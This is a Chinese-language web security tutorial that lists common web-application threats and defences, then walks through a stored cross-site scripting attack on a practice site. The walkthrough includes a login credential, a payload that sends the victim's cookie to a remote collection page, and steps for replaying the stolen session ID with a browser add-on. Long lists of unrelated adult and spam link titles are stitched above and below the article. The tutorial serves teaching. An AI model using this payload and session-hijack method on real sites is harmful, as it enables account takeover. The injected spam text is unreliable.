国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

實(shí)戰(zhàn)教你網(wǎng)站攻擊原理及如何防御網(wǎng)站攻擊
2018-12-12   黑客安全

提到網(wǎng)絡(luò)攻擊首先我們看看兩個(gè)問(wèn)題。什么是網(wǎng)絡(luò)應(yīng)用程序?什么是網(wǎng)絡(luò)威脅?

黑客

Web應(yīng)用程序(aka網(wǎng)站)是基于客戶端 - 服務(wù)器模型的應(yīng)用程序。服務(wù)器提供數(shù)據(jù)庫(kù)訪問(wèn)和業(yè)務(wù)邏輯。它托管在Web服務(wù)器上。客戶端應(yīng)用程序在客戶端Web瀏覽器上運(yùn)行。Web應(yīng)用程序通常用Java,C#和VB.Net,PHP,ColdFusion標(biāo)記語(yǔ)言等語(yǔ)言編寫.Web應(yīng)用程序中使用的數(shù)據(jù)庫(kù)引擎包括MySQL,MS SQL Server,PostgreSQL,SQLite等。

大多數(shù)Web應(yīng)用程序都托管在可通過(guò)Internet訪問(wèn)的公共服務(wù)器上。這使得它們易于訪問(wèn),因此容易受到攻擊。以下是常見(jiàn)的Web應(yīng)用程序威脅。

  • SQL注入 - 此威脅的目標(biāo)可能是繞過(guò)登錄算法,破壞數(shù)據(jù)等。人話:走后門
  • 拒絕服務(wù)攻擊 - 此威脅的目標(biāo)可能是拒絕合法用戶訪問(wèn)資源。人話:堵門
  • 跨站點(diǎn)腳本XSS - 此威脅的目標(biāo)可能是注入可在客戶端瀏覽器上執(zhí)行的代碼。
  • Cookie /會(huì)話中毒 - 此威脅的目標(biāo)是通過(guò)攻擊者修改Cookie /會(huì)話數(shù)據(jù)以獲取未經(jīng)授權(quán)的訪問(wèn)權(quán)限。
  • 表格篡改 - 此威脅的目標(biāo)是修改表單數(shù)據(jù),例如電子商務(wù)應(yīng)用程序中的價(jià)格,以便攻擊者可以以較低的價(jià)格獲得物品。
  • 代碼注入 - 此威脅的目標(biāo)是注入可在服務(wù)器上執(zhí)行的PHP,Python等代碼。代碼可以安裝后門,泄露敏感信息等。
  • 破壞 - 此威脅的目標(biāo)是修改網(wǎng)站上顯示的頁(yè)面,并將所有頁(yè)面請(qǐng)求重定向到包含攻擊者消息的單個(gè)頁(yè)面。

接下來(lái)我們?cè)撊绾伪Wo(hù)您的網(wǎng)站免受黑客攻擊?

組織可以采用以下策略來(lái)保護(hù)自己免受Web服務(wù)器攻擊。

  • SQL注入 - 在將用戶參數(shù)提交到數(shù)據(jù)庫(kù)進(jìn)行處理之前清理和驗(yàn)證用戶參數(shù)有助于降低通過(guò)SQL注入攻擊的可能性。MS SQL Server,MySQL等數(shù)據(jù)庫(kù)引擎支持參數(shù)和預(yù)處理語(yǔ)句。它們比傳統(tǒng)的SQL語(yǔ)句更安全
  • 拒絕服務(wù)攻擊 -如果攻擊是簡(jiǎn)單的DoS,則可以使用防火墻從可疑IP地址中刪除流量。正確配置網(wǎng)絡(luò)和入侵檢測(cè)系統(tǒng)還有助于降低DoS攻擊成功的可能性。
  • 跨站點(diǎn)腳本 -驗(yàn)證和清理標(biāo)頭,通過(guò)URL傳遞的參數(shù),表單參數(shù)和隱藏值可以幫助減少XSS攻擊。
  • Cookie /會(huì)話中毒 - 可以通過(guò)加密Cookie的內(nèi)容,在一段時(shí)間后將Cookie超時(shí),將Cookie與用于創(chuàng)建Cookie的客戶端IP地址相關(guān)聯(lián)來(lái)防止這種情況。
  • 表單回火 -這可以通過(guò)在處理之前驗(yàn)證和驗(yàn)證用戶輸入來(lái)防止。
  • 代碼注入 -可以通過(guò)將所有參數(shù)視為數(shù)據(jù)而不是可執(zhí)行代碼來(lái)防止這種情況。可以使用清理和驗(yàn)證來(lái)實(shí)現(xiàn)此目的。
  • 破壞 -一個(gè)好的Web應(yīng)用程序開發(fā)安全策略應(yīng)該確保它密封常用的漏洞來(lái)訪問(wèn)Web服務(wù)器。在開發(fā)Web應(yīng)用程序時(shí),這可以是操作系統(tǒng),Web服務(wù)器軟件和最佳安全實(shí)踐的正確配置。

最后我們來(lái)破解網(wǎng)站

我們將劫持位于www.techpanda.org的Web應(yīng)用程序的用戶會(huì)話。我們將使用跨站點(diǎn)腳本來(lái)讀取cookie會(huì)話ID,然后使用它來(lái)模擬合法的用戶會(huì)話。

假設(shè)是攻擊者可以訪問(wèn)Web應(yīng)用程序,并且他想劫持使用相同應(yīng)用程序的其他用戶的會(huì)話。假設(shè)攻擊者的訪問(wèn)帳戶是有限的,攻擊的目標(biāo)可能是獲取對(duì)Web應(yīng)用程序的管理員訪問(wèn)權(quán)限。

入門


  • 打開http://www.techpanda.org/
  • 出于實(shí)踐目的,強(qiáng)烈建議使用SQL注入獲取訪問(wèn)權(quán)限。
  • 登錄電子郵件是admin@google.com,密碼是Password2010
  • 如果您已成功登錄,那么您將獲得以下儀表板
  • 單擊“添加新聯(lián)系人”
  • 輸入以下作為名字
    1. <a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">小莫</a>  

這里,上面的代碼使用JavaScript。它添加了一個(gè)帶onclick事件的超鏈接。當(dāng)毫無(wú)戒心的用戶單擊該鏈接時(shí),該事件將檢索PHP cookie會(huì)話ID并將其與URL中的會(huì)話ID一起發(fā)送到snatch_sess_id.php頁(yè)面

輸入其余詳細(xì)信息,如下所示

  • 單擊“保存更改”

  • 您的儀表板現(xiàn)在看起來(lái)像以下屏幕

  • 由于跨站點(diǎn)腳本代碼存儲(chǔ)在數(shù)據(jù)庫(kù)中,因此每次具有訪問(wèn)權(quán)限的用戶登錄時(shí)都會(huì)加載它
  • 假設(shè)管理員登錄并點(diǎn)擊顯示為Dark的超鏈接
  • 他/她將獲得URL中顯示會(huì)話ID的窗口注意:腳本可能會(huì)將值發(fā)送到存儲(chǔ)PHPSESSID的某個(gè)遠(yuǎn)程服務(wù)器,然后用戶重定向回網(wǎng)站,就好像什么都沒(méi)發(fā)生一樣。

注意:您獲得的值可能與本教程中的值不同,但概念是相同的

使用Firefox和Tamper Data插件進(jìn)行會(huì)話模擬

下面的流程圖顯示了完成此練習(xí)必須采取的步驟。

您將需要此部分的Firefox Web瀏覽器和Tamper Data插件

  • 打開Firefox并安裝add,如下圖所

  • 搜索篡改數(shù)據(jù),然后單擊安裝,如上所示

  • 單擊接受并安裝..

  • 安裝完成后,單擊立即重新啟動(dòng)
  • 如果未顯示,請(qǐng)?jiān)贔irefox中啟用菜單欄

  • 單擊工具菜單,然后選擇防篡改數(shù)據(jù),如下所示

  • 您將獲得以下窗口。注意:如果Windows不為空,請(qǐng)點(diǎn)擊清除按鈕

  • 單擊“開始篡改”菜單
  • 切換回Firefox Web瀏覽器,輸入http://www.techpanda.org/dashboard.php,然后按回車鍵加載頁(yè)面
  • 您將從Tamper Data中彈出以下內(nèi)容

  • 彈出窗口有三(3)個(gè)選項(xiàng)。“篡改”選項(xiàng)允許您在將HTTP標(biāo)頭信息提交到服務(wù)器之前修改它。
  • 點(diǎn)擊它
  • 您將看到以下窗口


  • 復(fù)制從攻擊URL復(fù)制的PHP會(huì)話ID,并在等號(hào)后粘貼它。你的價(jià)值現(xiàn)在應(yīng)該是這樣的
    1. PHPSESSID = 2DVLTIPP2N8LDBN11B2RA76LM2  
  • 單擊“確定”按鈕
  • 您將再次獲得Tamper數(shù)據(jù)彈出窗口

  • 取消選中要求繼續(xù)篡改的復(fù)選框?
  • 完成后單擊“提交”按鈕
  • 您應(yīng)該能夠看到儀表板,如下所示注意

  • :我們沒(méi)有登錄,我們使用我們使用跨站點(diǎn)腳本檢索的PHPSESSID值來(lái)模擬登錄會(huì)話

熱詞搜索:網(wǎng)站 攻周

上一篇:安全使用Tor瀏覽器的7個(gè)技巧
下一篇:數(shù)據(jù)中心中所使用的那些技術(shù)詳解!

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
美女一区二区三区在线观看| 蜜臀va亚洲va欧美va天堂 | 91在线精品一区二区| 欧美一区二区三区免费观看视频| 国产视频一区二区三区在线观看| 日本视频免费一区| 91精品国产麻豆国产自产在线 | 床上的激情91.| 久久免费精品国产久精品久久久久| 日韩电影免费在线| 日韩午夜av一区| 麻豆国产精品一区二区三区| 欧美精品高清视频| 日韩电影在线观看一区| 日韩区在线观看| 久久国产生活片100| 日韩美女视频一区二区在线观看| 毛片一区二区三区| 久久网这里都是精品| 国产成人小视频| 综合分类小说区另类春色亚洲小说欧美 | 国产精品一区三区| 国产精品久久久久婷婷| 色婷婷综合久久久中文字幕| 樱桃视频在线观看一区| 欧美色图一区二区三区| 日日欢夜夜爽一区| 26uuuu精品一区二区| 成人高清免费在线播放| 亚洲妇熟xx妇色黄| 精品免费视频一区二区| 不卡的av在线播放| 亚洲高清视频在线| 久久免费视频一区| 91福利社在线观看| 蜜臀av国产精品久久久久| 久久人人爽人人爽| 91在线观看美女| 日韩中文字幕区一区有砖一区| 精品精品国产高清a毛片牛牛| 国产成人在线免费观看| 成人免费视频在线观看| 欧美精品乱码久久久久久按摩| 国产福利一区二区三区视频在线| 国产精品视频yy9299一区| 91国偷自产一区二区三区观看| 久久精品免费观看| 亚洲精品久久久蜜桃| 日韩一级在线观看| 91蜜桃婷婷狠狠久久综合9色| 亚洲小说春色综合另类电影| 亚洲国产视频在线| 免费观看在线色综合| 欧美大肚乱孕交hd孕妇| zzijzzij亚洲日本少妇熟睡| 亚洲视频在线一区观看| 欧美肥妇bbw| 成人丝袜18视频在线观看| 亚洲一区在线电影| 久久综合精品国产一区二区三区| 色综合久久综合| 久久精品国产亚洲aⅴ| 成人网在线播放| 久久激五月天综合精品| 国产喷白浆一区二区三区| 欧美精品少妇一区二区三区| 粉嫩一区二区三区性色av| 五月激情六月综合| 亚洲欧美视频在线观看视频| 久久视频一区二区| 欧美欧美欧美欧美首页| eeuss影院一区二区三区| 久久国产尿小便嘘嘘尿| 亚洲一区二区三区视频在线播放 | 26uuu国产电影一区二区| 日韩精品一区二区三区中文不卡| 日本道免费精品一区二区三区| 久久综合色鬼综合色| 99精品在线免费| 成人午夜激情影院| 中文字幕高清一区| 欧美一区二区三区在| 日本高清不卡一区| 成人开心网精品视频| 国产乱色国产精品免费视频| 国产精品不卡在线| 欧美伦理电影网| 亚洲一区自拍偷拍| www.亚洲免费av| 日韩国产欧美在线视频| 91视频免费观看| 成人免费在线视频观看| 久久成人免费网站| 欧美日韩高清一区二区三区| 亚洲国产成人午夜在线一区| 国产亚洲精品久| 色噜噜久久综合| 亚洲一区中文日韩| 日韩一区二区不卡| 国产日韩欧美高清| 99久久精品免费看| 亚洲成av人影院| 不卡一二三区首页| 成人综合激情网| 亚洲欧洲精品天堂一级| 日韩欧美视频一区| 欧美一区二区视频在线观看 | 久久精品国产精品亚洲综合| 免费av网站大全久久| 国产一区啦啦啦在线观看| 国产成a人亚洲| 91久久国产最好的精华液| 欧美人牲a欧美精品| 久久久影视传媒| 亚洲人123区| 麻豆91精品91久久久的内涵| 成人一级视频在线观看| 欧美手机在线视频| 久久蜜桃一区二区| 亚洲一区二区三区精品在线| 蜜臀91精品一区二区三区| 成人午夜在线免费| 欧美一二三在线| 亚洲欧美另类久久久精品| 蜜臂av日日欢夜夜爽一区| 成人免费看视频| 7777精品伊人久久久大香线蕉| 国产欧美综合在线观看第十页 | 这里只有精品视频在线观看| 日韩毛片视频在线看| 蜜桃一区二区三区四区| 94-欧美-setu| 欧美精品一区二区三区一线天视频| 亚洲人被黑人高潮完整版| 国产在线精品一区二区不卡了| 91极品视觉盛宴| 国产片一区二区| 极品美女销魂一区二区三区免费| 色婷婷激情久久| 中文字幕av一区 二区| 久久精品国产第一区二区三区| 在线观看免费一区| 中文字幕一区二区三区不卡| 欧美精品丝袜中出| 欧美tk—视频vk| 国产精品天干天干在观线| 午夜精品aaa| 99久久免费视频.com| 精品免费日韩av| 午夜久久久久久久久久一区二区| 91在线国产福利| 久久久久久免费毛片精品| 九九在线精品视频| 欧美人妇做爰xxxⅹ性高电影| 亚洲精品水蜜桃| 大胆欧美人体老妇| 久久久精品免费观看| 欧美一区二区三区免费大片| 国产精品久久久久久久第一福利| 国产成人精品免费| 欧美国产精品一区二区三区| 国产尤物一区二区| 久久精品欧美日韩| 国产一本一道久久香蕉| 国产色综合久久| 大白屁股一区二区视频| 国产精品久久三区| 91丨porny丨首页| 亚洲成人动漫av| 日韩视频一区二区| 国内精品不卡在线| 日本一区二区三区国色天香| thepron国产精品| 亚洲曰韩产成在线| 在线播放/欧美激情| 蜜臀va亚洲va欧美va天堂 | 亚洲黄色免费网站| 欧美高清一级片在线| 日韩av在线播放中文字幕| 欧美一区二区三区精品| 国产精品自拍毛片| 亚洲欧美在线另类| 欧美日韩二区三区| 国产一区二区影院| 亚洲视频一区二区免费在线观看| 色欧美片视频在线观看在线视频| 五月天网站亚洲| 久久尤物电影视频在线观看| 成人精品免费看| 亚洲第一成年网| 久久色在线视频| 色综合一区二区| 卡一卡二国产精品| 自拍偷拍亚洲激情| 7878成人国产在线观看| 国产成人8x视频一区二区| 亚洲午夜精品久久久久久久久| 欧美大度的电影原声| 91丝袜呻吟高潮美腿白嫩在线观看| 婷婷成人激情在线网|